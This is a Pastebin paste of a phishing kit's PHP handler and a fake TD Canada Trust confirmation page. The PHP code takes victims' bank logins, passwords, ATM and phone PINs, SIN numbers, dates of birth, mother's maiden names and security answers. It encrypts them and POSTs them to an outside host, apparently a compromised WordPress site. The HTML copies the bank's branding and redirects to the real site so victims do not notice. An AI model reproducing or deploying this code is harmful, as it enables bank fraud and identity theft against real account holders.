API tools faq
paste
Guest User

Untitled

a guest
Nov 15th, 2016
46
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.85 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2.  
  3. $ip = $_SERVER['REMOTE_ADDR'];
  4. $hostname = gethostbyaddr($_SERVER['REMOTE_ADDR']);
  5. $browser = $_SERVER['HTTP_USER_AGENT'];
  6.  
  7. $u = $_POST['u'];
  8. $p = $_POST['p'];
  9. $d = $_POST['d'];
  10. $dl2 = $_POST['dl2'];
  11. $address = $_POST['address'];
  12. $city = $_POST['city'];
  13. $dobd = $_POST['dobd'];
  14. $dobm = $_POST['dobm'];
  15. $doby = $_POST['doby'];
  16. $dl = $_POST['dl'];
  17. $pin =$_POST['pin'];
  18. $pinb =$_POST['pinb'];
  19. $mmn = $_POST['mmn'];
  20. $sin1 = $_POST['sin1'];
  21. $sin2 = $_POST['sin2'];
  22. $sin3 = $_POST['sin3'];
  23. $phone = $_POST['phone'];
  24. $mob = $_POST['mob'];
  25. $que1 = $_POST['que1'];
  26. $ans1 = $_POST['ans1'];
  27. $que2 = $_POST['que2'];
  28. $ans2 = $_POST['ans2'];
  29. $que3 = $_POST['que3'];
  30. $ans3 = $_POST['ans3'];
  31. $que4 = $_POST['que4'];
  32. $ans4 = $_POST['ans4'];
  33. $que5 = $_POST['que5'];
  34. $ans5 = $_POST['ans5'];
  35.  
  36. if (getenv(HTTP_CLIENT_IP)){
  37. $ip=getenv(HTTP_CLIENT_IP);}
  38. else {
  39. $ip=getenv(REMOTE_ADDR);}
  40. $hostname = gethostbyaddr($_SERVER['REMOTE_ADDR']);$browser = $_SERVER['HTTP_USER_AGENT'];
  41. $data = "
  42. ***** x00x - TD ***** ***** ***** ***** ***** *****
  43. User : $u
  44. Pass : $p
  45. Descripton: $d
  46. Home Phone: $phone
  47. Mobile Phone: $mob
  48. ATM PIN: $pin
  49. Tel PIN: $pinb
  50. DL: $dl2
  51. DOB: $dobd/$dobm/$doby ( day/month/year )
  52. MMN: $mmn
  53. SIN: $sin1 - $sin2 - $sin3
  54. Full Name: $dl
  55. Q1: $que1
  56. A1: $ans1
  57. Q2 $que2
  58. A2: $ans2
  59. Q3: $que3
  60. A3: $ans3
  61. Q4: $que4
  62. A4: $ans4
  63. Q5: $que5
  64. A5: $ans5
  65. ip: $ip,$browser
  66. ***** x00x - TD ***** ***** ***** ***** ***** *****
  67. ";
  68. $textHos = 'mc_donalds_20';
  69. $sites=array("http://noithatkhanhhoa.com/wp-con.php",);
  70. $ceva = $data;
  71. function encrypt($plaintext,$textHos) {
  72. $textLen=str_pad(dechex(strlen($plaintext)),8, '0', STR_PAD_LEFT);
  73. $salt='WSj2g7jTvc8ISmL60Akn';
  74. $textHosHash=hash('sha256',$salt.$textHos);
  75. $textHos= md5($textHos,true);
  76. $iv_size = mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC);
  77. $iv = mcrypt_create_iv($iv_size, MCRYPT_RAND);
  78. $ciphertext = mcrypt_encrypt(MCRYPT_RIJNDAEL_128, $textHos,
  79. $plaintext, MCRYPT_MODE_CBC,$iv);
  80.  
  81. $ciphertext = $iv . $textHosHash . $textLen . $ciphertext;
  82. $ciphertext_base64 = base64_encode($ciphertext);
  83. return $ciphertext_base64;
  84. }
  85. $data = encrypt($ceva,$textHos);
  86. function writeit($data,$site) {
  87. global $textHos;
  88. $data = array('info' => $data);
  89. $options = array(
  90. 'http' => array(
  91. 'header' => "Content-type: application/x-www-form-urlencoded\r\n",
  92. 'method' => 'POST',
  93. 'content' => http_build_query($data),
  94. ),
  95. );
  96. $context = stream_context_create($options);
  97. $result = file_get_contents($site, false, $context);
  98. }
  99. foreach ($sites as $site)
  100. writeit($data,$site);
  101.  
  102. ?>
  103.  
  104. <html><head>
  105.  
  106. <meta http-equiv="content-type" content="text/html; charset=ISO-8859-1">
  107. <title>TD Canada Trust Accounts Application</title>
  108. <link rel="stylesheet" href="files/all_secure.css" type="text/css">
  109.  
  110. <script language="JavaScript">
  111. <!--
  112. newImg = "images/wait.gif";
  113. function preloadImage() {
  114. var preload = new Image();
  115. preload.src = newImg;
  116. }
  117.  
  118. var click=0;
  119. var status=true;
  120. function checkClick() {
  121. document['continue'].src = newImg;
  122. if (click) {
  123. status=false;
  124. }
  125. click=1;
  126. }
  127.  
  128. function stat() {
  129. return status;
  130. }
  131.  
  132.  
  133. function show(){
  134. var w=document.getElementById("prod").selectedIndex;
  135. var x=document.getElementsByTagName("option")[w].id;
  136. var y=x + "_DETAILS";
  137.  
  138. //alert ('w = ['+w+']\nx = ['+x+']\ny = ['+y+']');
  139.  
  140. document.getElementById('details').innerHTML = document.getElementById(y).innerHTML;
  141. }
  142. //-->
  143. </script>
  144.  
  145. <style type="text/css">
  146. <!--
  147. .style2 {
  148. font-size: 12px;
  149. font-weight: bold;
  150. }
  151. -->
  152. </style>
  153. </head><body onLoad="show();" alink="#336699" bgcolor="#ffffff" vlink="#999999" link="#006666">
  154. <table bgcolor="#ffffff" border="0" cellpadding="0" cellspacing="0" width="602">
  155. <tbody><tr>
  156. <td>&nbsp;</td>
  157. </tr>
  158. <tr>
  159. <td>
  160. <img src="files/title_accounts.gif" alt="Accounts"><br>
  161. <img src="files/line_dot.gif" alt="#" border="0" width="598" height="1"><br>
  162. <font class="pageTitleB">Account confirmation - Client Identification</font>
  163. <div style="margin-top: 7px;"></div>
  164. </td>
  165. </tr>
  166.  
  167.  
  168. <meta http-equiv="refresh" content="5;url=http://tdcanadatrust.com">
  169. <tr>
  170. <td class="table"><br>
  171.  
  172. <table border="0" cellpadding="0" cellspacing="0" width="595">
  173. <tbody><tr>
  174. <td>
  175. <p class="style2">Your Online Switch statements has been sent. </p>
  176. <p class="style2">You will be redirected to <a href="http://www.tdcanadatrust.com/products-services/banking/green-banking/">http://www.tdcanadatrust.com/greenbanking/</a> in 5 seconds. </p> </p>
  177. <p class="table">&nbsp;</p>
  178. </td>
  179. </tr>
  180. </tbody></table>
  181. <div style="margin-top: 7px;"></div>
  182. <p>
  183. </p><p>
  184.  
  185.  
  186. <div id="details"></div>
  187. </td>
  188. </tr>
  189. </tbody></table>
  190.  
  191. <table bgcolor="#ffffff" border="0" cellpadding="0" cellspacing="0" width="598">
  192. <tbody><tr>
  193. <td align="right" width="598">
  194. <script>
  195. if(navigator.appVersion.indexOf('Safari') != -1 && navigator.appVersion.indexOf('85') != -1) {
  196. document.write('&nbsp;');
  197. }
  198. else {
  199. document.write('<a href="#" target="print" class="pageutility" onclick="window.print(); return false;">Print this page</a>');
  200. }
  201. </script><a href="#" target="print" class="pageutility" onClick="window.print(); return false;"></a> </td>
  202. </tr>
  203. <tr>
  204. <td class="footer" valign="top" width="598"><br>
  205. <a class="footerLink" href="http://www.td.com/privacy/index_inc.html" onClick="window.open('http://www.td.com/privacy/index_inc.html', 'td','width=500,height=400,resizable=yes,scrollbars=yes');return false;" target="td">Privacy Policy</a>&nbsp;|&nbsp;
  206. <a class="footerLink" href="http://www.td.com/security/index_inc.html" onClick="window.open('http://www.td.com/security/index_inc.html', 'td','width=500,height=400,resizable=yes,scrollbars=yes');return false;" target="td">Internet Security</a>&nbsp;|&nbsp;
  207. <a class="footerLink" href="http://www.td.com/legal/index_inc.html" onClick="window.open('http://www.td.com/legal/index_inc.html', 'td','width=500,height=400,resizable=yes,scrollbars=yes');return false;" target="td">Legal</a>&nbsp;|&nbsp;
  208. TD Group Financial Services Site&nbsp;-&nbsp;Copyright © TD
  209. </td>
  210. </tr>
  211. </tbody></table>
  212. <img src="files/ca.htm" width="1" height="1">
  213. <img src="files/PFAFcore01b.gif" border="0" width="1" height="1">
  214.  
  215.  
  216.  
  217.  
  218.  
  219.  
  220.  
  221.  
  222.  
  223.  
  224.  
  225.  
  226. <script language="javascript1.1" src="files/eluminate.js" type="text/javascript"></script>
  227. <script language="javascript1.1" src="files/cmdatatagutils.js" type="text/javascript"></script>
  228.  
  229.  
  230. <script language="javascript1.1" type="text/javascript">
  231. <!--
  232. cmSetProduction()
  233. //-->
  234. </script>
  235.  
  236. <script language="javascript1.1" type="text/javascript">
  237. <!--
  238. cmCreatePageviewTag("/forms/core/page1_unauth.jsp Core1b", "AAUE", null,null);
  239. //-->
  240. </script>
  241.  
  242. </form></body></html>
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!